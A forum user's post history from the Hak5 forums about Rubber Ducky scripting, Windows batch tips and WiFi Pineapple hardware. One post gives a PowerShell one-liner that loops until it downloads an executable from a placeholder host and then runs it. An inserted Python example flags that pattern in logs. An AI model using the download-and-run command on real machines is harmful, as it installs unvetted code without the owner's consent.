White Light
Posts posted by White Light
-
-
Is it not
CTRL SHIFT ENTER
Pre-edit:
Weird, you're right. The wiki does say CTRL-SHIFT, but I've never done it that way.
-
Duckencoder is made in Java. You just download it, install JRE (or was it JDK...I never remember). To run the encoder, simply run this:
java -jar encoder.jar -i "duckyscriptfile.txt" -o inject.bin
As for the scripts themselves, you basically just type whatever you want the ducky to type later, like this:
DELAY 2000
GUI r
DELAY 100
STRING notepad
ENTER
DELAY 1000
STRING Hello Hammerhead
ENTER
STRING Just imagine all the things you can do with a keyboard
ENTER
STRING The ducky can do that too!
I haven't seen any fully comprehensive guides for keyboard shortcuts, but probably the most important one is WIN+R (GUI r on the ducky). There's a lot of information available on the ducky wiki too.
-
Can't you replace the use of the _LenLoop label and associated GOTO with a nice FOR loop?
You can easily do that if you know the reasonable maximum for the length of string (like 512).
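@echo off
setlocal enabledelayedexpansion
set /p "in=Input: "
rem Start at 1: the loop below counts every character after the first.
set len=1
set #=%in%
rem Binary search: for each power of two, if the remainder is longer than that, add it and drop that many characters.
for %%a in (256 128 64 32 16 8 4 2 1) do if not "!#:~%%a!"=="" set /a len+=%%a&set #=!#:~%%a!
echo %in% is %len% chars long.
pause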
Though the original length script will take n/9 iterations to get the length, this would always take 9 loops for up to 512 characters.
-
Gosub is not a command. It's
call
There is also no "return", though the closest is
goto :eof
Your code would be as follows:
@echo off
echo Calling a subroutine.
call :subr1
rem The : is required when calling a subroutine.
echo Returned from the subroutine.
pause
rem Stop here so the main script does not fall through into :subr1 a second time.
goto :eof
:subr1
echo In the subroutine.
goto :eof
rem goto :eof is not needed here as it would already be at the end of the file. Subroutines will run the code all the way to the end of the file, so this just jumps to the end.
-
Actually I'm fairly certain the green you are seeing is the green from the newly discovered LED, leaking into the plastic lens.
The blue LED is a single color -- blue.
Yeah, that's what I said. The green LED lit up if you had an external adapter plugged in before boot, instead of the solid blue.
-
Back on 1.0.1, if you had an external wifi adapter plugged in before it boots, it would light up the green LED instead of solid blue. Not really sure why that happens, but it was pretty neat.
-
I've noticed it on 0.2 as well. In addition, you can't add the deleted SSIDs back until you remove them first...which is weird.
-
Is it getting hotter than 110 C / 230 F? If so -- that's a problem. Otherwise, not so much.
Under normal circumstances indoors it's very unlikely that it would require active cooling. The thermal ratings on these chips are pretty high and the passive cooling of the NANO is designed within the chip tolerances.
I'll have to look at the exact temps when it's particularly hot, but leaving it running against the battery (or any flat surface, for that matter) seems to make things quite hot. Pressed against the battery, inside the tactical pouch, for hours at a time seems to exacerbate things.
-
Gonna have to update the pineapple logo to fit better, but looking good so far...
-
I hope not, but who knows, sometimes one just wants to have options ;)
here a first sketch with active cooling using a 15mm 5V micro fan:
I've been noticing that my nano is running awfully hot lately. Has any progress been made on this? Having some kind of active cooling solution would be helpful.
-
I'd prefer it to be a bit more subtle, along the lines of "Router Login Page" or something similar. I'll let you know if I find the location of that field if you're interested in changing it yourself.
Now that is a good idea.
-
Doesn't the twin duck firmware allow the duck to act as a mass storage device then you have to click to activate the keyboard emulator? What I was meaning is keeping the injections automatic while having an on board SD for storage. The SD card typically isn't considered a mass storage device so group policies tend to ignore them.
Nope, runs just fine. Acts as both keyboard and mass storage simultaneously. You can run stuff off the SD card as well as copy stuff to the SD card, all automatically.
-
Just one thing I noticed while trying to reproduce your issue (and the desired results): The autossh file is in /etc/config not /etc/conf
-
Is it typing anything and just failing GUI r or is it everything? Try opening a notepad window to see what is actually being typed.
-
What are the exact scripts you're trying to run? Keep in mind, the OS takes a bit of time before it'll accept key input when you first plug it in, so it's good to add a 2-4s delay at the top.
-
Please elaborate on what it is doing if it's not doing what you want. Both scripts are known to work using TwinDuck.
-
I would sincerely hope that apps like Facebook and Twitter implement SSL pinning to protect against something like this.
-
Both the Rubber Ducky and the Wifi Pineapple (new Nano version) are available in the hakshop, and shipping isn't too awful at $37 USD for the cheapest rate through USPS. I just checked some random address in Auckland to get an estimate, might (but unlikely) be different for your exact location. Mark V's aren't too commonly sold by third parties, and when they are they're generally for a premium (especially since they've been out of stock for quite some time now). I found one in an eBay auction that just started, with a buy-it-now of $325 plus over $100 USD (!) for shipping (to my own country, yours would be much higher).
-
You'll need Twin Duck for that.
-
Spent about 5 minutes using Safari for iOS trying to reproduce the problem, with no luck. Latest version of iOS Chrome.
-
One thing I noticed from time to time is the back button (upper left corner) occasionally goes to https://forums.hak5.org/undefined while browsing in Chrome for iOS. This doesn't happen every time, and for some reason it will work fine every time if I open the link in a new tab.
-
I'd suggest an initial delay of at least 2 seconds, and (at least while testing) increase your delay between ALL actions you run. 100ms may not be enough for the start menu to open up and permit entry.
Mr-Protocol brings up a good point too: using the run box is likely better than the start menu, as you don't have to deal with unreliable GUIs. You can start CMD as an administrator automatically through the run box by using powershell.
-
Why not try using a program that you already know can work on all the systems you're testing on?
-
I see a bunch of suggestions that are "easier", but why not just continuously retry the download using just powershell? That way you don't need to worry about walking away.
do{sleep 5;(New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe')}while(!$?);&'C:\helper.exe'
Should work just fine. It'll loop forever until the file is downloaded (or until the process is closed), then it runs it.
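Added example (not part of White Light's post): a defender-side check for the pattern in the one-liner above, flagging logged PowerShell command lines where WebClient.DownloadFile saves a file that the same command then runs. The sample log lines, the regexes and the severity labels are constructed for illustration.

```python
import re

# Constructed sample command lines, shaped like process-creation or
# script-block log entries. The first repeats the one-liner from the post.
SAMPLE_EVENTS = [
    "powershell -c \"do{sleep 5;(New-Object Net.WebClient).DownloadFile("
    "'http://yourhost.com/helpfulexecutable.exe','C:\\helper.exe')}"
    "while(!$?);&'C:\\helper.exe'\"",
    "powershell -c \"(New-Object System.Net.WebClient).DownloadFile("
    "'https://example.test/report.pdf','C:\\Users\\a\\report.pdf')\"",
    "powershell -c \"Get-ChildItem C:\\Users | Sort-Object Length\"",
]

# DownloadFile('<url>','<path>') with single- or double-quoted arguments.
DOWNLOAD_RE = re.compile(
    r"""DownloadFile\(\s*(['"])(?P<url>[^'"]+)\1\s*,\s*(['"])(?P<path>[^'"]+)\3\s*\)""",
    re.IGNORECASE,
)
# A do{...} or while(...) wrapper suggests unattended retrying.
LOOP_RE = re.compile(r"\bdo\s*\{|\bwhile\s*\(", re.IGNORECASE)


def classify(cmdline):
    """Return (severity, findings) for one logged command line."""
    findings = []
    for m in DOWNLOAD_RE.finditer(cmdline):
        path = m.group("path")
        findings.append("download:" + m.group("url"))
        # Is the saved file invoked after the download, either with the
        # call operator (& 'path') or with Start-Process?
        tail = cmdline[m.end():]
        run_re = re.compile(
            r"(&|Start-Process)\s*['\"]?" + re.escape(path), re.IGNORECASE)
        if run_re.search(tail):
            findings.append("executes:" + path)
    if not findings:
        return "none", findings
    if LOOP_RE.search(cmdline):
        findings.append("retry-loop")
    executed = any(f.startswith("executes:") for f in findings)
    return ("high" if executed else "low"), findings


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(classify(event))
```

A download on its own is rated low here because plenty of legitimate scripts fetch files; the download followed by execution of the same path is what raises it.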
Encoders, startup guides, resources for beginners.
in Classic USB Rubber Ducky
Posted
Oh yeah. Just about everything you can do with a mouse can be done using just a keyboard, and being able to automate it makes it even easier to reproduce. I learned this as a kid, when my crappy bluetooth mouse's batteries would die or it would (frequently) disconnect.